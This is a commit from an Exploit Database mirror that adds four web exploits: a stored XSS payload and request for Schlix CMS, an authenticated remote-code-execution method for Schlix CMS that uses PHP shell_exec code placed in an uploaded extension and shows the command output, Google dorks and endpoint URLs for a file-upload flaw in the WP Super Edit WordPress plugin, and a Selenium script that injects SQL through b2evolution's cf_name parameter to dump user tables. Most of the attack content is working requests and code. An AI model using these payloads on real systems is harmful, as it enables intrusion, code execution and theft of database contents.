bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-05-07

Browse source 
4 changes to exploits/shellcodes

Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)
Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload
b2evolution 7-2-2 - 'cf_name' SQL Injection
This commit is contained in:
Offensive Security 2021-05-07 05:02:58 +00:00
parent ca3206ff78
commit 72135d9121
5 changed files with 591 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

182
exploits/multiple/webapps/49837.txt Normal file
View file

@ -0,0 +1,182 @@
# Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
# Date: 2021-05-05
# Exploit Author: Emircan Baş
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer
==> Tutorial <==
1- Login with your account.
2- Go to the contacts section. Directory is '/admin/app/contact'.
3- Create a new category and type an XSS payload into the category title.
4- XSS payload will be executed when we travel to created page.
==> Vulnerable Source Code <==
<article class="main category">
<div class="media-header-full-width " style="background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');">
<div class="media-header-title container d-flex h-100">
<div class="row align-self-center w-100">
<div class="col-8 mx-auto">
<div class="text-center">
<h1 class="item title" itemprop="headline">&#039;"><script>alert(1)</script></h1> # OUR PAYLOAD IS NON-EXECUTEABLE
</div>
</div>
</div>
</div>
</div>
<div class="breadcrumb-bg">
<div class="container">
<div class="breadcrumb-container"><ol class="breadcrumb"><li class="breadcrumb-item"><a class="breadcrumb-home" href="/cms">
<i class="fa fa-home"></i></a></li><li class="breadcrumb-item"><a href="/cms/contacts/">Contacts</a></li><li class="breadcrumb-item">
<a href="/cms/contacts/script-alert-2-script/"><script>alert(1)</script></a></li></ol></div></div> # EXECUTED PLACE
</div>
==> HTTP Request <==
POST /admin/app/contacts?action=savecategory HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489
Content-Length: 4146
Origin: (ORIGIN)
Connection: close
Referer: (REFERER)
Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="_csrftoken"
49feefcd2b917b9855cd55c8bd174235fa5912e4
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cid"
6
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="parent_id"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="guid"
ee34f23a-7167-a454-8576-20bef7575c15
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="title"
<script>alert(1)</script>
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="status"
1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="virtual_filename"
script-alert-1-script
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="summary"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="description"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="meta_description"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="meta_key"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="tags"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="date_available"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="date_expiry"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="items_per_page"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
display_pagetitle
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
display_child_categories
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
display_items
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[child_categories_sortby]"
date_created
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[items_sortby]"
date_created
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read_everyone"
everyone
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"
1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"
2
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"
3
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_write[]"
1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_selection"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_upload"; filename=""
Content-Type: application/octet-stream
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_path"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_url"
-----------------------------280033592236615772622294478489--

295
exploits/multiple/webapps/49838.txt Normal file
View file

@ -0,0 +1,295 @@
# Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)
# Date: 2021-05-06
# Exploit Author: Eren Saraç
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer
==> Tutorial <==
1- Login with your account.
2- Go to the block management section. Directory is '/admin/app/core.blockmanager'.
3- Create a new category.
4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp
5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory.
6- Paste this PHP code below and save it.
#####################################
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
#####################################
7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'.
8- Install a package to created category and enter the installed 'mailchimp' extension.
9- Click the 'About' tab and our php code will be executed.
==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <==
<?php
$name = 'mailchimp';
$type = 'block';
$guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
$version = '1.0';
$license = 'MIT';
$description = 'Mailchimp is the leading email marketing platform, that lets you send out fully customized email and newsletter campaigns to your subscribers. It is an imperative tool to build and follow through on your sales funnel, and helps you create and maintain lasting relations with your site visitors and customers.';
$author = 'Alip';
$url = 'https://github.com/calip/app_mailchimp';
$email = 'asalip.putra@gmail.com';
$copyright = 'Copyright &copy;2019 calip';
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
==> HTTP Request (ZIP Extension Installation) <==
POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Schlix-Ajax: 1
Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130
Content-Length: 51585
Origin: http(s)://(ORIGIN)
Connection: close
Referer: http(s)://(REFERER)/admin/app/core.blockmanager
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2;
schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="_csrftoken"
a3b9a0da8d6be08513f60d1744e2642df0702ff7
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip"
Content-Type: application/x-zip-compressed
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__total_file_size"
0
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__max_file_count"
20
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="password"
# Your ACC Password.
-----------------------------29322337091578227221515354130--
==> HTTP Request (RCE - About Tab) <==
GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http(s)://(HOST)/
Connection: close
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2;
schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1
==> HTTP Response (RCE - About Tab) <==
HTTP/1.1 200 OK
Date: Wed, 05 May 2021 21:49:24 GMT
Server: Apache/2.4.46 (Win64) PHP/7.3.21
X-Powered-By: PHP/7.3.21
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49575
<!DOCTYPE html>
<html>
<body>
<div id="tab_options" class="schlixui-childtab">
<pre>
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:902 0.0.0.0:0 LISTENING
TCP 0.0.0.0:912 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3307 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING
TCP 0.0.0.0:50296 0.0.0.0:0 LISTENING
TCP 127.0.0.1:80 127.0.0.1:58843 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58853 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58854 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58859 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58860 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58865 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58868 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58883 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58893 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58894 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58899 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58902 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58908 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58918 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58919 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58924 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58886 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58887 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58888 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58891 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58905 CLOSE_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58907 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58911 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58913 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58915 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58916 TIME_WAIT
TCP 127.0.0.1:58424 127.0.0.1:58425 ESTABLISHED
TCP 127.0.0.1:58425 127.0.0.1:58424 ESTABLISHED
TCP 127.0.0.1:58435 127.0.0.1:58436 ESTABLISHED
TCP 127.0.0.1:58436 127.0.0.1:58435 ESTABLISHED
TCP 127.0.0.1:58565 127.0.0.1:58566 ESTABLISHED
TCP 127.0.0.1:58566 127.0.0.1:58565 ESTABLISHED
TCP 127.0.0.1:58639 127.0.0.1:58640 ESTABLISHED
TCP 127.0.0.1:58640 127.0.0.1:58639 ESTABLISHED
TCP 169.254.22.167:139 0.0.0.0:0 LISTENING
TCP 169.254.224.26:139 0.0.0.0:0 LISTENING
TCP 192.168.1.8:139 0.0.0.0:0 LISTENING
TCP 192.168.1.8:49500 95.101.14.77:443 ESTABLISHED
TCP 192.168.1.8:57059 162.159.129.235:443 ESTABLISHED
TCP 192.168.1.8:57902 162.159.138.234:443 ESTABLISHED
TCP 192.168.1.8:58453 44.235.189.138:443 ESTABLISHED
TCP 192.168.1.8:58626 162.159.138.232:443 ESTABLISHED
TCP 192.168.1.8:58627 162.159.133.234:443 ESTABLISHED
TCP 192.168.1.8:58699 162.159.135.232:443 ESTABLISHED
TCP 192.168.1.8:58841 20.44.232.74:443 ESTABLISHED
TCP 192.168.1.8:58942 162.159.138.232:443 ESTABLISHED
TCP 192.168.1.8:58951 138.68.92.190:443 ESTABLISHED
TCP 192.168.1.8:60549 51.103.5.159:443 ESTABLISHED
TCP 192.168.1.8:60610 104.66.70.197:443 ESTABLISHED
TCP 192.168.1.8:60611 104.66.70.197:443 ESTABLISHED
TCP 192.168.1.8:60612 217.31.233.104:443 CLOSE_WAIT
TCP [::]:80 [::]:0 LISTENING
TCP [::]:135 [::]:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
TCP [::]:3306 [::]:0 LISTENING
TCP [::]:3307 [::]:0 LISTENING
TCP [::]:7680 [::]:0 LISTENING
TCP [::]:49664 [::]:0 LISTENING
TCP [::]:49665 [::]:0 LISTENING
TCP [::]:49666 [::]:0 LISTENING
TCP [::]:49667 [::]:0 LISTENING
TCP [::]:49668 [::]:0 LISTENING
TCP [::]:50296 [::]:0 LISTENING
TCP [::1]:3306 [::1]:58845 TIME_WAIT
TCP [::1]:3306 [::1]:58856 TIME_WAIT
TCP [::1]:3306 [::1]:58857 TIME_WAIT
TCP [::1]:3306 [::1]:58858 TIME_WAIT
TCP [::1]:3306 [::1]:58932 TIME_WAIT
TCP [::1]:3306 [::1]:58935 TIME_WAIT
TCP [::1]:3306 [::1]:58940 TIME_WAIT
TCP [::1]:3306 [::1]:58950 TIME_WAIT
TCP [::1]:3306 [::1]:58953 ESTABLISHED
TCP [::1]:3306 [::1]:58954 ESTABLISHED
TCP [::1]:49485 [::1]:49486 ESTABLISHED
TCP [::1]:49486 [::1]:49485 ESTABLISHED
TCP [::1]:49669 [::]:0 LISTENING
TCP [::1]:58844 [::1]:3306 TIME_WAIT
TCP [::1]:58845 [::1]:3306 TIME_WAIT
TCP [::1]:58855 [::1]:3306 TIME_WAIT
TCP [::1]:58856 [::1]:3306 TIME_WAIT
TCP [::1]:58857 [::1]:3306 TIME_WAIT
TCP [::1]:58858 [::1]:3306 TIME_WAIT
TCP [::1]:58861 [::1]:3306 TIME_WAIT
TCP [::1]:58862 [::1]:3306 TIME_WAIT
TCP [::1]:58863 [::1]:3306 TIME_WAIT
TCP [::1]:58864 [::1]:3306 TIME_WAIT
TCP [::1]:58866 [::1]:3306 TIME_WAIT
TCP [::1]:58867 [::1]:3306 TIME_WAIT
TCP [::1]:58869 [::1]:3306 TIME_WAIT
TCP [::1]:58870 [::1]:3306 TIME_WAIT
TCP [::1]:58884 [::1]:3306 TIME_WAIT
TCP [::1]:58885 [::1]:3306 TIME_WAIT
TCP [::1]:58929 [::1]:3306 TIME_WAIT
TCP [::1]:58930 [::1]:3306 TIME_WAIT
TCP [::1]:58931 [::1]:3306 TIME_WAIT
TCP [::1]:58932 [::1]:3306 TIME_WAIT
TCP [::1]:58934 [::1]:3306 TIME_WAIT
TCP [::1]:58935 [::1]:3306 TIME_WAIT
TCP [::1]:58939 [::1]:3306 TIME_WAIT
TCP [::1]:58940 [::1]:3306 TIME_WAIT
TCP [::1]:58946 [::1]:3306 TIME_WAIT
TCP [::1]:58947 [::1]:3306 TIME_WAIT
TCP [::1]:58949 [::1]:3306 TIME_WAIT
TCP [::1]:58950 [::1]:3306 TIME_WAIT
TCP [::1]:58953 [::1]:3306 ESTABLISHED
TCP [::1]:58954 [::1]:3306 ESTABLISHED
UDP 0.0.0.0:5050 *:*
UDP 0.0.0.0:5353 *:*
UDP 0.0.0.0:5355 *:*
UDP 0.0.0.0:53240 *:*
UDP 0.0.0.0:53241 *:*
UDP 127.0.0.1:1900 *:*
UDP 127.0.0.1:62353 *:*
UDP 127.0.0.1:63129 *:*
UDP 192.168.1.8:137 *:*
UDP 192.168.1.8:138 *:*
UDP 192.168.1.8:1900 *:*
UDP 192.168.1.8:2177 *:*
UDP 192.168.1.8:63128 *:*
UDP [::]:5353 *:*
UDP [::]:5355 *:*
UDP [::1]:1900 *:*
UDP [::1]:63125 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:1900 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:2177 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:63124 *:*
</pre>
<div class="content">
<div class="row">
<div class="col-xs-12">
<div class="text-center">
<h1>mailchimp</h1>
<p>v1.0</p><p>Author: <a href="mailto:asalip.putra@gmail.com">Alip</a></p>
<p>Web: <a href="https://github.com/calip/app_mailchimp">https://github.com/calip/app_mailchimp</a></p>
<p><a href="/cms/admin/app/core.blockmanager?action=uninstall&name=mailchimp"><i class="fa fa-times-circle"></i>Uninstall</a></p>
</div>
</div>
</div>
</div>
</div>
</body>

27
exploits/php/webapps/49839.txt Normal file
View file

@ -0,0 +1,27 @@
# Title: Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload
# Author: h4shur
# date: 2021-05-06
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/wp-super-edit/
# Version : 2.5.4 and earlier
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs
# Dork :
# inurl:"wp-content/plugins/wp-super-edit/superedit/"
# inurl:"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/"
### Note:
# 1. Technical Description:
This plugin allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
# 2. Technical Description:
WordPress Plugin "wp-super-edit" allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. This vulnerability is caused by FCKeditor in this plugin. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
### POC:
* Exploit 1 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/browser.html
* Exploit 2 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/connectors/test.html
* Exploit 3 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/test.html
* Exploit 4 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/frmupload.html

83
exploits/php/webapps/49840.py Executable file
View file

@ -0,0 +1,83 @@
# Exploit Title: b2evolution 7-2-2 - 'cf_name' SQL Injection
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.06.2021
# Vendor: https://b2evolution.net/
# Link: https://b2evolution.net/downloads/7-2-2
# CVE: CVE-2021-28242
# Proof: https://streamable.com/x51kso
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-28242
from selenium import webdriver
import time
# Vendor: https://typo3.org/
website_link="
http://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link"
# enter your login username
username="admin"
# enter your login password
password="FvsDq7fmHvWF"
#enter the element for username input field
element_for_username="x"
#enter the element for password input field
element_for_password="q"
#enter the element for submit button
element_for_submit="login_action[login]"
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
#browser = webdriver.Firefox() #uncomment this line,for chrome users
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit vulnerability MySQL obtain sensitive database information by
injecting SQL commands into the "cf_name" parameter
time.sleep(7)
# Receaving sensitive info for evo_users
browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
# Receaving sensitive info for evo_blogs
browser.get(("
http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
# Receaving sensitive info for evo_section
browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
browser.close()
print("At the time, of the exploit, you had to see information about the
tables...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Sorry, your exploit is not working for some reasons...")

4
files_exploits.csv
View file

@ -44003,3 +44003,7 @@ id,file,description,date,author,type,platform,port
49834,exploits/multiple/webapps/49834.js,"Markright 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
49835,exploits/multiple/webapps/49835.js,"Markdownify 1.2.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Enes Özeser",webapps,multiple,
49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",2021-05-06,"Eren Saraç",webapps,multiple,
49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",2021-05-06,h4shur,webapps,php,
49840,exploits/php/webapps/49840.py,"b2evolution 7-2-2 - 'cf_name' SQL Injection",2021-05-06,nu11secur1ty,webapps,php,

Can't render this file because it is too large.